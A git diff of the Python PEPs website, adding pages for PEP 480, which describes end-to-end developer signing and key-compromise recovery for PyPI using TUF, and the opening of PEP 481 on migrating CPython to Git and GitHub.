• Consistent snapshot: A set of TUF metadata and target files that capture the complete state of all projects on PyPI as they existed at some fixed point in time.
• Developer: Either the owner or maintainer of a project who is allowed to update TUF metadata, as well as distribution metadata and files for a given project.
• Online key: A private cryptographic key that MUST be stored on the PyPI server infrastructure. This usually allows automated signing with the key. An attacker who compromises the PyPI infrastructure will be able to immediately read these keys.
• Offline key: A private cryptographic key that MUST be stored independent of the PyPI server infrastructure. This prevents automated signing with the key. An attacker who compromises the PyPI infrastructure will not be able to immediately read these keys.
• Threshold signature scheme: A role can increase its resilience to key compromises by specifying that at least t out of n keys are REQUIRED to sign its metadata. A compromise of t-1 keys is insufficient to compromise the role itself. Saying that a role requires (t, n) keys denotes the threshold signature property (see the sketch after this list).
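As an illustrative sketch of the threshold property (the helper and key names below are ours, not TUF’s), metadata for a (t, n) role counts as signed only once at least t distinct authorized keys have produced valid signatures:

    def meets_threshold(valid_keyids, authorized_keyids, threshold):
        # Count only distinct authorized keys; two signatures made with
        # the same key must not count twice toward the threshold.
        return len(set(valid_keyids) & set(authorized_keyids)) >= threshold

    # A (2, 3) role: at least two of the three registered keys must sign.
    assert meets_threshold({"k1", "k2"}, {"k1", "k2", "k3"}, 2)
    assert not meets_threshold({"k1"}, {"k1", "k2", "k3"}, 2)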
+
+

Maximum Security Model

+

The maximum security model permits developers to sign their projects and to upload signed metadata to PyPI. In the model proposed in this PEP, if the PyPI infrastructure were compromised, attackers would be unable to serve malicious versions of a claimed project without having access to that project’s developer key. Figure 1 depicts the changes made to the metadata layout of the minimum security model, namely that developer roles are now supported and that three new delegated roles exist: claimed, recently-claimed, and unclaimed. The bins role from the minimum security model has been renamed unclaimed and can contain any projects that have not been added to claimed. The unclaimed role functions just as before (i.e., as explained in PEP 458, projects added to this role are signed by PyPI with an online key). Offline keys provided by developers ensure the strength of the maximum security model over the minimum model. Although the minimum security model supports continuous delivery of projects, all projects are signed by an online key. That is, an attacker who compromises only PyPI can corrupt packages in the minimum security model, but cannot do so in the maximum security model without also compromising a developer’s key.

../_images/pep-0480-1.png

Figure 1: An overview of the metadata layout in the maximum security model. +The maximum security model supports continuous delivery and survivable key +compromise.

+

Projects that are signed by developers and uploaded to PyPI for the first time +are added to the recently-claimed role. The recently-claimed role uses an +online key, so projects uploaded for the first time are immediately available +to clients. After some time has passed, PyPI administrators MAY periodically +move (e.g., every month) projects listed in recently-claimed to the claimed +role for maximum security. The claimed role uses an offline key, thus +projects added to this role cannot be easily forged if PyPI is compromised.

+

The recently-claimed role is separate from the unclaimed role for usability +and efficiency, not security. If new project delegations were prepended to +unclaimed metadata, unclaimed would need to be re-downloaded every time a +project obtained a key. By separating out new projects, the amount of data +retrieved is reduced. From a usability standpoint, it also makes it easier for +administrators to see which projects are now claimed. This information is +needed when moving keys from recently-claimed to claimed, which is +discussed in more detail in the “Producing Consistent Snapshots” section.

+
+
+

End-to-End Signing

+

End-to-end signing allows both PyPI and developers to sign for the metadata +downloaded by clients. PyPI is trusted to make uploaded projects available to +clients (PyPI signs the metadata for this part of the process), and developers +sign the distributions that they upload to PyPI.

+

In order to delegate trust to a project, developers are required to submit at +least one public key to PyPI. Developers may submit multiple public keys for +the same project (for example, one key for each maintainer of the project). +PyPI takes all of the project’s public keys and adds them to parent +metadata that PyPI then signs. After the initial trust is established, +developers are required to sign distributions that they upload to PyPI using +at least one public key’s corresponding private key. The signed TUF metadata that +developers upload to PyPI includes information like the distribution’s file +size and hash, which package managers use to verify distributions that are +downloaded.

+

The practical implications of end-to-end signing are the extra administrative work needed to delegate trust to a project, and the signed metadata that developers MUST upload to PyPI along with the distribution. Specifically, PyPI is expected to periodically sign metadata with an offline key by adding projects to the claimed metadata file and signing it. In contrast, projects are only ever signed with an online key in the minimum security model. End-to-end signing does require manual intervention to delegate trust (i.e., to sign metadata with an offline key), but this is a one-time cost and projects have stronger protections against PyPI compromises thereafter.

+
+
+

Metadata Signatures, Key Management, and Signing Distributions

+

This section discusses the tools, signature scheme, and signing methods that +PyPI MAY recommend to implementors of the signing tools. Developers are +expected to use these tools to sign and upload distributions to PyPI. To +summarize the RECOMMENDED tools and schemes discussed in the subsections below, +developers MAY generate cryptographic keys and sign metadata (with the Ed25519 +signature scheme) in some automated fashion, where the metadata includes the +information required to verify the authenticity of the distribution. +Developers then upload metadata to PyPI, where it will be available for +download by package managers such as pip (i.e., package managers that support +TUF metadata). The entire process is transparent to the end-users (using a +package manager that supports TUF) that download distributions from PyPI.

+

The first three subsections (Cryptographic Signature Scheme, Cryptographic Key +Files, and Key Management) cover the cryptographic components of the developer +release process. That is, which key type PyPI supports, how keys may be +stored, and how keys may be generated. The two subsections that follow the +first three discuss the PyPI modules that SHOULD be modified to support TUF +metadata. For example, Twine and Distutils are two projects that SHOULD be +modified. Finally, the last subsection goes over the automated key management +and signing solution that is RECOMMENDED for the signing tools.

+

TUF’s design is flexible with respect to cryptographic key types, signatures, +and signing methods. The tools, modification, and methods discussed in the +following sections are RECOMMENDATIONS for the implementors of the signing +tools.

+
+

Cryptographic Signature Scheme: Ed25519

+

The package manager (pip) shipped with CPython MUST work on non-CPython +interpreters and cannot have dependencies that have to be compiled (i.e., the +PyPI+TUF integration MUST NOT require compilation of C extensions in order to +verify cryptographic signatures). Verification of signatures MUST be done in +Python, and verifying RSA [8] signatures in pure-Python may be impractical due +to speed. Therefore, PyPI MAY use the Ed25519 signature scheme.

+

Ed25519 [9] is a public-key signature system that uses small cryptographic +signatures and keys. A pure-Python implementation of the Ed25519 signature +scheme is available. Verification of Ed25519 signatures is fast even when +performed in Python.
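For illustration only, signing and verification with the PyNaCl bindings look like the following (PyNaCl wraps libsodium in C; as discussed above, pip itself would need a pure-Python implementation instead):

    from nacl.signing import SigningKey

    signing_key = SigningKey.generate()           # small 32-byte private key
    verify_key = signing_key.verify_key           # small public key

    signed = signing_key.sign(b"metadata bytes")  # 64-byte signature + message
    verify_key.verify(signed)                     # raises BadSignatureError on tampering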

+
+
+

Cryptographic Key Files

+

The implementation MAY encrypt key files with AES-256-CTR-Mode and strengthen passwords with PBKDF2-HMAC-SHA256 (100K iterations by default, but this may be overridden by the developer). The current Python implementation of TUF can use any cryptographic library (support for PyCA cryptography will be added in the future), may override the default number of PBKDF2 iterations, and allows the KDF to be tweaked to taste.
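A minimal sketch of that scheme using the PyCA cryptography package (the parameter choices follow the text above; the function name is ours):

    from os import urandom

    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

    def encrypt_key_file(password: bytes, plaintext: bytes,
                         iterations: int = 100_000):
        salt, nonce = urandom(16), urandom(16)
        kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32,
                         salt=salt, iterations=iterations)
        key = kdf.derive(password)  # password-strengthened AES-256 key
        enc = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
        return salt, nonce, enc.update(plaintext) + enc.finalize()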

+
+
+

Key Management: miniLock

+

An easy-to-use key management solution is needed. One solution is to derive a +private key from a password so that developers do not have to manage +cryptographic key files across multiple computers. miniLock is an example +of how this can be done. Developers may view the cryptographic key as a +secondary password. miniLock also works well with a signature scheme like +Ed25519, which only needs a very small key.
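A sketch of a password-derived signing key in the spirit of miniLock, which derives keys with scrypt (the helper name and parameters are ours):

    import hashlib

    from nacl.signing import SigningKey

    def key_from_password(password: str, salt: bytes) -> SigningKey:
        # The same password and salt always reproduce the same Ed25519 key,
        # so no key file has to follow the developer between machines.
        seed = hashlib.scrypt(password.encode(), salt=salt,
                              n=2**14, r=8, p=1, dklen=32)
        return SigningKey(seed)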

+
+
+

Third-party Upload Tools: Twine

+

Third-party tools like Twine MAY be modified (if they wish to support +distributions that include TUF metadata) to sign and upload developer projects +to PyPI. Twine is a utility for interacting with PyPI that uses TLS to upload +distributions, and prevents MITM attacks on usernames and passwords.

+
+
+

Build backends

+

Build backends MAY be modified to sign metadata and to upload signed +distributions to PyPI.

+
+
+

Automated Signing Solution

+

An easy-to-use key management solution is RECOMMENDED for developers. One +approach is to generate a cryptographic private key from a user password, akin +to miniLock. Although developer signatures can remain optional, this approach +may be inadequate due to the great number of potentially unsigned dependencies +each distribution may have. If any one of these dependencies is unsigned, it +negates any benefit the project gains from signing its own distribution (i.e., +attackers would only need to compromise one of the unsigned dependencies to +attack end-users). Requiring developers to manually sign distributions and +manage keys is expected to render key signing an unused feature.

+

A default, PyPI-mediated key management and package signing solution that is +transparent to developers and does not require a key escrow (sharing of +encrypted private keys with PyPI) is RECOMMENDED for the signing tools. +Additionally, the signing tools SHOULD circumvent the sharing of private keys +across multiple machines of each developer. This means that the key management +solution SHOULD support multiple keys for each project.

+

The following outlines an automated signing solution that a new developer MAY +follow to upload a distribution to PyPI:

+
1. Register a PyPI project.
2. Enter a secondary password (independent of the PyPI user account password).
3. Optional: Add a new identity to the developer’s PyPI user account from a second machine (after a password prompt).
4. Upload project.
5. Optional: Other maintainers associated with the project may log in and enter a secondary password to add their identity to the project.

Step 1 is the normal procedure followed by developers to register a PyPI +project.

+

Step 2 generates an encrypted key file (private), uploads an Ed25519 public key +to PyPI, and signs the TUF metadata that is generated for the distribution.

+

Optionally adding a new identity from a second machine, by simply entering a password, in step 3 also generates an encrypted private key file and uploads an Ed25519 public key to PyPI. Separate identities MAY be created to allow a developer to sign releases on multiple machines. An existing verified identity (its public key is contained in project metadata or has been uploaded to PyPI) signs for new identities. By default, project metadata has a signature threshold of “1” and other verified identities may create new releases to satisfy the threshold.

+

Step 4 uploads the distribution file and TUF metadata to PyPI. The “Snapshot +Process” section discusses in detail the procedure followed by developers to +upload a distribution to PyPI.

+

Step 5 allows other maintainers to generate an encrypted key file, in a similar +manner to step 2. These keys SHOULD be uploaded to PyPI and added to the TUF +metadata. This key MAY be used to upload future releases of the project.

+

Generation of cryptographic files and signatures is transparent to the +developers in the default case: developers need not be aware that packages are +automatically signed. However, the signing tools should be flexible; developers +may want to generate their own keys and handle the key management themselves. +In this case, the developers may simply upload their public key(s) to PyPI.

+

The repository and developer TUF tools currently support all of the +recommendations previously mentioned, except for the automated signing +solution, which SHOULD be added to Distlib, Twine, and other third-party +signing tools. The automated signing solution calls available repository tool +functions to sign metadata and to generate the cryptographic key files.

+
+
+

Snapshot Process

+

The snapshot process is fairly simple and SHOULD be automated. The snapshot +process MUST keep in memory the latest working set of root, targets, and +delegated roles. Every minute or so the snapshot process will sign for this +latest working set. (Recall that project uploads continuously +inform the snapshot process about the latest delegated metadata in a +concurrency-safe manner. The snapshot process will actually sign for a copy of +the latest working set while the latest working set in memory will be updated +with information that is continuously communicated by the project transaction +processes.) The snapshot process MUST generate and sign new timestamp +metadata that will vouch for the metadata (root, targets, and delegated +roles) generated in the previous step. Finally, the snapshot process MUST make +available to clients the new timestamp and snapshot metadata representing +the latest snapshot.
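An illustrative sketch of a single snapshot pass (the data structures and the signing callable are ours, not the reference implementation’s):

    import threading

    class WorkingSet:
        # Latest versions of root, targets, and delegated-role metadata,
        # updated concurrently by project upload processes.
        def __init__(self):
            self.lock = threading.Lock()
            self.versions = {}  # role name -> latest metadata version

    def snapshot_once(working_set, sign):
        # Copy under the lock so uploads may keep mutating the live set
        # while the frozen copy is being signed.
        with working_set.lock:
            frozen = dict(working_set.versions)
        snapshot_md = sign("snapshot", frozen)
        # The timestamp metadata vouches for the snapshot just produced.
        timestamp_md = sign("timestamp", {"snapshot": snapshot_md})
        return snapshot_md, timestamp_md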

+

A claimed or recently-claimed project will need to upload in its +transaction to PyPI not just targets (a simple index as well as distributions) +but also TUF metadata. The project MAY do so by uploading a ZIP file containing +two directories, /metadata/ (containing delegated targets metadata files) and +/targets/ (containing targets such as the project simple index and +distributions that are signed by the delegated targets metadata).

+

Whenever the project uploads metadata or target files to PyPI, PyPI SHOULD check the +project TUF metadata for at least the following properties:

+
• A threshold number of the developer keys registered with PyPI by that project MUST have signed for the delegated targets metadata file that represents the “root” of targets for that project (e.g. metadata/targets/project.txt).
• The signatures of delegated targets metadata files MUST be valid.
• The delegated targets metadata files MUST NOT have expired.
• The delegated targets metadata MUST be consistent with the targets.
• A delegator MUST NOT delegate targets that were not delegated to itself by another delegator.
• A delegatee MUST NOT sign for targets that were not delegated to itself by a delegator.
+

If PyPI chooses to check the project TUF metadata, then PyPI MAY choose to +reject publishing any set of metadata or target files that do not meet these +requirements.

+

PyPI MUST enforce access control by ensuring that each project can only write +to the TUF metadata for which it is responsible. It MUST do so by ensuring that +project upload processes write to the correct metadata as well as correct +locations within those metadata. For example, a project upload process for +an unclaimed project MUST write to the correct target paths in the correct +delegated unclaimed metadata for the targets of the project.

+

On rare occasions, PyPI MAY wish to extend the TUF metadata format for projects +in a backward-incompatible manner. Note that PyPI will NOT be able to +automatically rewrite existing TUF metadata on behalf of projects in order to +upgrade the metadata to the new backward-incompatible format because this would +invalidate the signatures of the metadata as signed by developer keys. +Instead, package managers SHOULD be written to recognize and handle multiple +incompatible versions of TUF metadata so that claimed and recently-claimed +projects could be offered a reasonable time to migrate their metadata to newer +but backward-incompatible formats. One mechanism for handling this version +change is described in TAP 14.

+

If PyPI eventually runs out of disk space to produce a new consistent snapshot, +then PyPI MAY then use something like a “mark-and-sweep” algorithm to delete +sufficiently outdated consistent snapshots. That is, only outdated metadata +like timestamp and snapshot that are no longer used are deleted. +Specifically, in order to preserve the latest consistent snapshot, PyPI would +walk objects – beginning from the root (timestamp) – of the latest +consistent snapshot, mark all visited objects, and delete all unmarked objects. +The last few consistent snapshots may be preserved in a similar fashion. +Deleting a consistent snapshot will cause clients to see nothing except HTTP +404 responses to any request for a target of the deleted consistent snapshot. +Clients SHOULD then retry (as before) their requests with the latest consistent +snapshot.
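An illustrative mark-and-sweep over consistent snapshots (the data structures are ours): walk from the timestamp roots of the snapshots to preserve, mark everything reachable, and delete the rest.

    def sweep(retained_roots, children, all_files):
        # Mark every file reachable from the retained snapshots' timestamp
        # roots; the unmarked remainder is safe to delete.
        marked, stack = set(), list(retained_roots)
        while stack:
            f = stack.pop()
            if f not in marked:
                marked.add(f)
                stack.extend(children.get(f, ()))
        return all_files - marked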

+

All package managers that support TUF metadata MUST be modified to download +every metadata and target file (except for timestamp metadata) by including, +in the request for the file, the cryptographic hash of the file in the +filename. Following the filename convention RECOMMENDED in the next +subsection, a request for the file at filename.ext will be transformed to the +equivalent request for the file at digest.filename.

+

Finally, PyPI SHOULD use a transaction log to record project transaction +processes and queues so that it will be easier to recover from errors after a +server failure.

+
+
+

Producing Consistent Snapshots

+

PyPI is responsible for updating, depending on the project, either the +claimed, recently-claimed, or unclaimed metadata and associated delegated +metadata. Every project MUST upload its set of metadata and targets in a single +transaction. The uploaded set of files is called the “project transaction.” +How PyPI MAY validate files in a project transaction is discussed in a later +section. The focus of this section is on how PyPI will respond to a project +transaction.

+

Every metadata and target file MUST include in its filename the hex digest +of its BLAKE2b-256 hash, which PyPI may prepend to filenames after the files +have been uploaded. For this PEP, it is RECOMMENDED that PyPI adopt a simple +convention of the form: digest.filename, where filename is the original +filename without a copy of the hash, and digest is the hex digest of the hash.
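For example, using hashlib’s BLAKE2b with a 32-byte (256-bit) digest, the convention could be computed as follows (the helper name is ours):

    import hashlib

    def consistent_name(filename: str, data: bytes) -> str:
        digest = hashlib.blake2b(data, digest_size=32).hexdigest()
        return f"{digest}.{filename}"

    # Prints '<64 hex digits>.project.txt'
    print(consistent_name("project.txt", b'{"signed": {}}'))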

+

When an unclaimed project uploads a new transaction, a project transaction +process MUST add all new target files and relevant delegated unclaimed metadata. +The project upload process MUST inform the snapshot process about new +delegated unclaimed metadata.

+

When a recently-claimed project uploads a new transaction, a project +upload process MUST add all new target files and delegated targets metadata for +the project. If the project is new, then the project upload process MUST +also add new recently-claimed metadata with the public keys (which MUST be +part of the transaction) for the project. recently-claimed projects have a +threshold value of “1” set by the upload process. Finally, the project +upload process MUST inform the snapshot process about new +recently-claimed metadata, as well as the current set of delegated targets +metadata for the project.

+

The upload process for a claimed project is slightly different in that +PyPI administrators periodically move (a manual process that MAY occur every +two weeks to a month) projects from the recently-claimed role to the +claimed role. (Moving a project from recently-claimed to claimed is a +manual process because PyPI administrators have to use an offline key to sign +the claimed project’s distribution.) A project upload process MUST then +add new recently-claimed and claimed metadata to reflect this migration. As +is the case for a recently-claimed project, the project upload process +MUST always add all new target files and delegated targets metadata for the claimed +project. Finally, the project upload process MUST inform the consistent +snapshot process about new recently-claimed or claimed metadata, as well as +the current set of delegated targets metadata for the project.

+

Project upload processes SHOULD be automated, except when PyPI +administrators move a project from the recently-claimed role to the claimed +role. Project upload processes MUST also be applied atomically: either all +metadata and target files – or none of them – are added. The project transaction +processes and snapshot process SHOULD work concurrently. Finally, project +upload processes SHOULD keep in memory the latest claimed, +recently-claimed, and unclaimed metadata so that they will be correctly +updated in new consistent snapshots.

+

The queue MAY be processed concurrently in order of appearance, provided that +the following rules are observed:

+
1. No pair of project upload processes may concurrently work on the same project.
2. No pair of project upload processes may concurrently work on unclaimed projects that belong to the same delegated unclaimed role.
3. No pair of project upload processes may concurrently work on new recently-claimed projects.
4. No pair of project upload processes may concurrently work on new claimed projects.
5. No project upload process may work on a new claimed project while another project upload process is working on a new recently-claimed project and vice versa.

These rules MUST be observed to ensure that metadata is not read from or +written to inconsistently.

+
+
+

Auditing Snapshots

+

If a malicious party compromises PyPI, they can sign arbitrary files with any +of the online keys. The roles with offline keys (i.e., root and targets) +are still protected. To safely recover from a repository compromise, snapshots +should be audited to ensure that files are only restored to trusted versions.

+

When a repository compromise has been detected, the integrity of three types of +information must be validated:

+
1. If the online keys of the repository have been compromised, they can be revoked by having the targets role sign new metadata, delegated to a new key.
2. If the role metadata on the repository has been changed, this will impact the metadata that is signed by online keys. Any role information created since the compromise should be discarded. As a result, developers of new projects will need to re-register their projects.
3. If the packages themselves may have been tampered with, they can be validated using the stored hash information for packages that existed in trusted metadata before the compromise. Also, new distributions that are signed by developers in the claimed role may be safely retained. However, any distributions signed by developers in the recently-claimed or unclaimed roles should be discarded.

In order to safely restore snapshots in the event of a compromise, PyPI SHOULD +maintain a small number of its own mirrors to copy PyPI snapshots according to +some schedule. The mirroring protocol can be used immediately for this +purpose. The mirrors must be secured and isolated such that they are +responsible only for mirroring PyPI. The mirrors can be checked against one +another to detect accidental or malicious failures.

+

Another approach is to periodically generate the cryptographic hash of +each snapshot and tweet it. For example, upon receiving the tweet, a +user comes forward with the actual metadata and the repository +maintainers are then able to verify the metadata’s cryptographic hash. +Alternatively, PyPI may periodically archive its own versions of +snapshots rather than rely on externally provided metadata. In this +case, PyPI SHOULD take the cryptographic hash of every package on the +repository and store this data on an offline device. If any package +hash has changed, this indicates an attack has occurred.

+

Attacks that serve different versions of metadata or that freeze a version of a +package at a specific version can be handled by TUF with techniques such as +implicit key revocation and metadata mismatch detection [2].

+
+
+
+

Key Compromise Analysis

+

This PEP has covered the maximum security model, the TUF roles that should be +added to support continuous delivery of distributions, how to generate and sign +the metadata of each role, and how to support distributions that have been +signed by developers. The remaining sections discuss how PyPI SHOULD audit +repository metadata, and the methods PyPI can use to detect and recover from a +PyPI compromise.

+

Table 1 summarizes a few of the attacks possible when a threshold number of +private cryptographic keys (belonging to any of the PyPI roles) are +compromised. The leftmost column lists the roles (or a combination of roles) +that have been compromised, and the columns to the right show whether the +compromised roles leaves clients susceptible to malicious updates, freeze +attacks, or metadata inconsistency attacks.

Role Compromise | Malicious Updates | Freeze Attack | Metadata Inconsistency Attacks
timestamp | NO; snapshot and targets or any of the delegated roles need to cooperate | YES; limited by earliest root, targets, or bin metadata expiry time | NO; snapshot needs to cooperate
snapshot | NO; timestamp and targets or any of the delegated roles need to cooperate | NO; timestamp needs to cooperate | NO; timestamp needs to cooperate
timestamp AND snapshot | NO; targets or any of the delegated roles need to cooperate | YES; limited by earliest root, targets, or bin metadata expiry time | YES; limited by earliest root, targets, or bin metadata expiry time
targets OR claimed OR recently-claimed OR unclaimed OR project | NO; timestamp and snapshot need to cooperate | NOT APPLICABLE; need timestamp and snapshot | NOT APPLICABLE; need timestamp and snapshot
(timestamp AND snapshot) AND project | YES | YES; limited by earliest root, targets, or bin metadata expiry time | YES; limited by earliest root, targets, or bin metadata expiry time
(timestamp AND snapshot) AND (recently-claimed OR unclaimed) | YES; but only of projects not delegated by claimed | YES; limited by earliest root, targets, claimed, recently-claimed, project, or unclaimed metadata expiry time | YES; limited by earliest root, targets, claimed, recently-claimed, project, or unclaimed metadata expiry time
(timestamp AND snapshot) AND (targets OR claimed) | YES | YES; limited by earliest root, targets, claimed, recently-claimed, project, or unclaimed metadata expiry time | YES; limited by earliest root, targets, claimed, recently-claimed, project, or unclaimed metadata expiry time
root | YES | YES | YES

Table 1: Attacks that are possible by compromising certain combinations of role keys. In September 2013, it was shown how the latest version (at the time) of pip was susceptible to these attacks and how TUF could protect users against them [7]. The roles signed by offline keys are root, targets, and claimed.

+

Note that compromising targets or any delegated role (except for project +targets metadata) does not immediately allow an attacker to serve malicious +updates. The attacker must also compromise the timestamp and snapshot +roles (which are both online and therefore more likely to be compromised). +This means that in order to launch any attack, one must not only be able to act +as a man-in-the-middle, but also compromise the timestamp key (or compromise +the root keys and sign a new timestamp key). To launch any attack other +than a freeze attack, one must also compromise the snapshot key. Finally, a +compromise of the PyPI infrastructure MAY introduce malicious updates to +recently-claimed projects because the keys for these roles are online.

+
+

In the Event of a Key Compromise

+

A key compromise means that a threshold of keys belonging to developers or the +roles on PyPI, as well as the PyPI infrastructure, have been compromised and +used to sign new metadata on PyPI.

+

If a threshold number of developer keys of a project have been compromised, +the project MUST take the following steps:

+
1. The project metadata and targets MUST be restored to the last known good consistent snapshot where the project was not known to be compromised. This can be done by developers repackaging and resigning all targets with the new keys.
2. The project’s metadata MUST have its version numbers incremented, expiry times suitably extended, and signatures renewed.

Whereas PyPI MUST take the following steps:

+
1. Revoke the compromised developer keys from the recently-claimed or claimed role. This is done by replacing the compromised developer keys with newly issued developer keys.
2. A new timestamped consistent snapshot MUST be issued.

If a threshold number of timestamp, snapshot, recently-claimed, or +unclaimed keys have been compromised, then PyPI MUST take the following +steps:

+
1. Revoke the timestamp, snapshot, and targets role keys from the root role. This is done by replacing the compromised timestamp, snapshot, and targets keys with newly issued keys.
2. Revoke the recently-claimed and unclaimed keys from the targets role by replacing their keys with newly issued keys. Sign the new targets role metadata and discard the new keys (because, as we explained earlier, this increases the security of targets metadata).
3. Clear all targets or delegations in the recently-claimed role and delete all associated delegated targets metadata. Recently registered projects SHOULD register their developer keys again with PyPI.
4. All targets of the recently-claimed and unclaimed roles SHOULD be compared with the last known good consistent snapshot where none of the timestamp, snapshot, recently-claimed, or unclaimed keys were known to have been compromised. Added, updated, or deleted targets in the compromised consistent snapshot that do not match the last known good consistent snapshot SHOULD be restored to their previous versions. After ensuring the integrity of all unclaimed targets, the unclaimed metadata MUST be regenerated.
5. The recently-claimed and unclaimed metadata MUST have their version numbers incremented, expiry times suitably extended, and signatures renewed.
6. A new timestamped consistent snapshot MUST be issued.
+

This would preemptively protect all of these roles even though only one of them +may have been compromised.

+

If a threshold number of the targets or claimed keys have been compromised, then there is little that an attacker would be able to do without the timestamp and snapshot keys. In this case, PyPI MUST simply revoke the compromised targets or claimed keys by replacing them with new keys in the root and targets roles, respectively.

+

If a threshold number of the timestamp, snapshot, and claimed keys have +been compromised, then PyPI MUST take the following steps in addition to the +steps taken when either the timestamp or snapshot keys are compromised:

+
1. Revoke the claimed role keys from the targets role and replace them with newly issued keys.
2. All project targets of the claimed roles SHOULD be compared with the last known good consistent snapshot where none of the timestamp, snapshot, or claimed keys were known to have been compromised. Added, updated, or deleted targets in the compromised consistent snapshot that do not match the last known good consistent snapshot MAY be restored to their previous versions. After ensuring the integrity of all claimed project targets, the claimed metadata MUST be regenerated.
3. The claimed metadata MUST have their version numbers incremented, expiry times suitably extended, and signatures renewed.
+

Following these steps would preemptively protect all of these roles even though +only one of them may have been compromised.

+

If a threshold number of root keys have been compromised, then PyPI MUST take +the steps taken when the targets role has been compromised. All of the +root keys must also be replaced.

+

It is also RECOMMENDED that PyPI sufficiently document compromises with +security bulletins. These security bulletins will be most informative when +users of pip-with-TUF are unable to install or update a project because the +keys for the timestamp, snapshot, or root roles are no longer valid. +Users could then visit the PyPI web site to consult security bulletins that +would help to explain why users are no longer able to install or update, and +then take action accordingly. When a threshold number of root keys have not +been revoked due to a compromise, then new root metadata may be safely +updated because a threshold number of existing root keys will be used to sign +for the integrity of the new root metadata. TUF clients will be able to +verify the integrity of the new root metadata with a threshold number of +previously known root keys. This will be the common case. In the worst +case, where a threshold number of root keys have been revoked due to a +compromise, an end-user may choose to update new root metadata with +out-of-band mechanisms.

+
+
+
+

Appendix A: PyPI Build Farm and End-to-End Signing

+

PyPI administrators intend to support a central build farm. The PyPI build +farm will auto-generate a Wheel, for each distribution that is uploaded by +developers, on PyPI infrastructure and on supported platforms. Package +managers will likely install projects by downloading these PyPI Wheels (which +can be installed much faster than source distributions) rather than the source +distributions signed by developers. The implications of having a central build +farm with end-to-end signing SHOULD be investigated before the maximum security +model is implemented.

+

An issue with a central build farm and end-to-end signing is that developers +are unlikely to sign Wheel distributions once they have been generated on PyPI +infrastructure. However, generating wheels from source distributions that are +signed by developers can still be beneficial, provided that building Wheels is +a deterministic process. If deterministic builds are infeasible, developers +may delegate trust of these wheels to a PyPI role that signs for wheels with +an online key.

+
+
+

References

+ +
+
+

Acknowledgements

+

This material is based upon work supported by the National Science Foundation +under Grants No. CNS-1345049 and CNS-0959138. Any opinions, findings, and +conclusions or recommendations expressed in this material are those of the +author(s) and do not necessarily reflect the views of the National Science +Foundation.

+

We thank Alyssa Coghlan, Daniel Holth, Donald Stufft, Sumana +Harihareswara, and the distutils-sig community in general for helping +us to think about how to usably and efficiently integrate TUF with +PyPI.

+

Roger Dingledine, Sebastian Hahn, Nick Mathewson, Martin Peck and Justin +Samuel helped us to design TUF from its predecessor Thandy of the Tor project.

+

We appreciate the efforts of Konstantin Andrianov, Geremy Condra, Zane Fisher, +Justin Samuel, Tian Tian, Santiago Torres, John Ward, and Yuyu Zheng to develop +TUF.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0480.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0481/index.html b/pep-0481/index.html
new file mode 100644
index 00000000000..d268cfc5096
--- /dev/null
+++ b/pep-0481/index.html
@@ -0,0 +1,456 @@
PEP 481 – Migrate CPython to Git, Github, and Phabricator | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 481 – Migrate CPython to Git, Github, and Phabricator

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
29-Nov-2014
+
Post-History:
+
29-Nov-2014
+
+
+
+
+
+

Abstract

+
+

Note

+

This PEP has been withdrawn. If you’re looking for the PEP documenting the move to GitHub, please refer to PEP 512.

+
+

This PEP proposes migrating the repository hosting of CPython and the +supporting repositories to Git and Github. It also proposes adding Phabricator +as an alternative to Github Pull Requests to handle reviewing changes. This +particular PEP is offered as an alternative to PEP 474 and PEP 462 which aims +to achieve the same overall benefits but restricts itself to tools that support +Mercurial and are completely Open Source.

+
+
+

Rationale

+

CPython is an open source project which relies on a number of volunteers +donating their time. As an open source project it relies on attracting new +volunteers as well as retaining existing ones in order to continue to have +a healthy amount of manpower available. In addition to increasing the amount of +manpower that is available to the project, it also needs to allow for effective +use of what manpower is available.

+

The current toolchain of the CPython project is a custom and unique combination +of tools which mandates a workflow that is similar to one found in a lot of +older projects, but which is becoming less and less popular as time goes on.

+

The one-off nature of the CPython toolchain and workflow means that any new contributor is going to need to spend time learning the tools and workflow before they can start contributing to CPython. Once a new contributor goes through the process of learning the CPython workflow, they are also unlikely to be able to take that knowledge and apply it to future projects they wish to contribute to. This acts as a barrier to contribution which will scare off potential new contributors.

+

In addition, the tooling that CPython uses is under-maintained and antiquated, and it lacks important features that enable committers to use their time more effectively when reviewing and approving changes. The fact that it is under-maintained means that bugs are likely to last longer, if they ever get fixed, and that the tools are more likely to go down for extended periods of time. The fact that it is antiquated means that it doesn’t effectively harness the capabilities of the modern web platform. Finally, the fact that it lacks several important features, such as pre-testing of commits and an automatic merge tool, means that committers have to do needless busy work to commit even the simplest of changes.

+
+

Version Control System

+

The first decision that needs to be made is the VCS of the primary server side +repository. Currently the CPython repository, as well as a number of supporting +repositories, uses Mercurial. When evaluating the VCS we must consider the +capabilities of the VCS itself as well as the network effect and mindshare of +the community around that VCS.

+

There are really only two real options for this, Mercurial and Git. Between the +two of them the technical capabilities are largely equivalent. For this reason +this PEP will largely ignore the technical arguments about the VCS system and +will instead focus on the social aspects.

+

It is not possible to get exact numbers for the number of projects or people +which are using a particular VCS, however we can infer this by looking at +several sources of information for what VCS projects are using.

+

The Open Hub (previously Ohloh) statistics [1] show that 37% of +the repositories indexed by The Open Hub are using Git (second only to SVN +which has 48%) while Mercurial has just 2% (beating only bazaar which has 1%). +This has Git being just over 18 times as popular as Mercurial on The Open Hub.

+

Another source of information on the popularity of the different VCSs is PyPI itself. This source is more targeted at the Python community itself since it represents projects developed for Python. Unfortunately PyPI does not have a standard location for representing this information, so this requires manual processing. If we limit our search to the top 100 projects on PyPI (ordered by download counts) we can see that 62% of them use Git, 22% use Mercurial, and 13% use something else. This has Git being just under 3 times as popular as Mercurial for the top 100 projects on PyPI.

+

Obviously from these numbers Git is by far the more popular DVCS for open +source projects and choosing the more popular VCS has a number of positive +benefits.

+

